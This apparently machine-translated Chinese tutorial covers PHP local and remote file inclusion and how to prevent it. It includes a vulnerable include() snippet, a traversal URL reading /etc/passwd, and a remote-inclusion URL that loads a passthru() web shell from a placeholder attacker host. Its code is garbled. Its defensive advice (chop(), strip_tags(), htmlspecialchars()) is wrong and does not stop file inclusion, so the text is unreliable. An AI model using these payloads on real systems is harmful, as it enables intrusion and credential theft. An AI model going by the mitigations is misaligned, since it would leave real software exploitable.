溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

文件包含漏洞防護以及常見文件讀取payload的示例分析

發(fā)布時間:2021-12-29 18:01:27 來源:億速云 閱讀:297 作者:小新 欄目:網(wǎng)絡(luò)管理

這篇文章主要介紹文件包含漏洞防護以及常見文件讀取payload的示例分析,文中介紹的非常詳細,具有一定的參考價值,感興趣的小伙伴們一定要看完!

僅供參考學習使用

一、安全示例

現(xiàn)在請看下面的代碼

<a href=index.php?page=file1.php> Files </a>
<? Php
$page = $ _GET [page];
include ($ page);
?>

這里顯然不應該使用它。$page變量并未完全清除。 $page輸入直接定向到網(wǎng)頁,這是一個很大錯誤。這里刪除通過瀏覽器傳遞的所有輸入。當用戶在訪問網(wǎng)頁時單擊“文件”訪問到“ files.php”時,將出現(xiàn)下面的內(nèi)容。

http://localhost/index.php?page=files.php

現(xiàn)在,如果沒有一個清理輸入中變量$page,我們可以利用它執(zhí)行我們的命令。如果主機在Unix/Linux服務器,我們可以讀取用戶密碼,如下面的url所示。

http://localhost/index.php?page=.. /../../../../../etc/passwd

上面的url會返回/etc/passwd

<a href=index.php?page=file1.php> Files </a>
<? Php
$ page = $ _GET [page];
include ($ page);
?>

現(xiàn)在假設(shè)我們輸入的url如下

http://localhost/index.php?page=http://google.com/

可能是$ page變量最初放置在頁面上的位置,我們得到了google.com主頁。我們都知道c99(shell)可以做什么,并且如果編碼人員注意的話,它們可能會包含在頁面中,從而允許用戶在瀏覽敏感文件。讓我們看一下網(wǎng)頁上可能發(fā)生的一些更簡單的事情?,F(xiàn)在,我們創(chuàng)建一個名為“ test.php”的文件,并將以下代碼放入其中,然后保存。

<? Php
passthru ($ _ GET [cmd]);
?>

我們可以利用此文件來利用它, PHP中的passthru()函數(shù)是非常危險的。使用test.php中的這段代碼,我們可以向網(wǎng)頁發(fā)送請求,包括文件包含漏洞。如以下url所示

http://localhost/index.php?page=http: //someevilhost.com/test.php

當代碼使用$_GET請求,我們必須提供一個參數(shù)傳遞給passthru(). 我們可以在url中這樣輸入。

http://localhost/index.php?page=http://someevilhost.com/test.php?cmd=cat /etc/passwd

這unix機器也將提取的文件/etc/passwd使用的cat的命令?,F(xiàn)在我們需要知道如何控制它,使任何人都不可能執(zhí)行命令,和如何包括遠程執(zhí)行你的服務器命令。 我們可以禁止passthru()函數(shù)。正如前文所述我們可以清除輸入。我們這里可以在函數(shù)中使用一些PHP建議的結(jié)構(gòu)。最初,perl的chop()函數(shù)適應了PHP,該PHP從數(shù)組中刪除了空格。我們可以這樣使用它。

<a href=index.php?page=file1.php> Files </a>
<? Php
$ page = chop ($ _ GET [page]);
include ($ page);
?>

php中有許多函數(shù)可以清除字符串,如htmlspecialchars()htmlentities(),stripslashes()等。我們可以在PHP中執(zhí)行一個可以為所有內(nèi)容的函數(shù)。如下面代碼所示

<? Php
function cleanAll ($ input) {
$ input = strip_tags ($ input);
$ input = htmlspecialchars ($ input);
return ($ input);
}
?>

這里還可以使用str_replace()函數(shù),并且還有很多其他函數(shù)可以清除它們。

以上是“文件包含漏洞防護以及常見文件讀取payload的示例分析”這篇文章的所有內(nèi)容,感謝各位的閱讀!希望分享的內(nèi)容對大家有幫助,更多相關(guān)知識,歡迎關(guān)注億速云行業(yè)資訊頻道!

向AI問一下細節(jié)

免責聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進行舉報,并提供相關(guān)證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI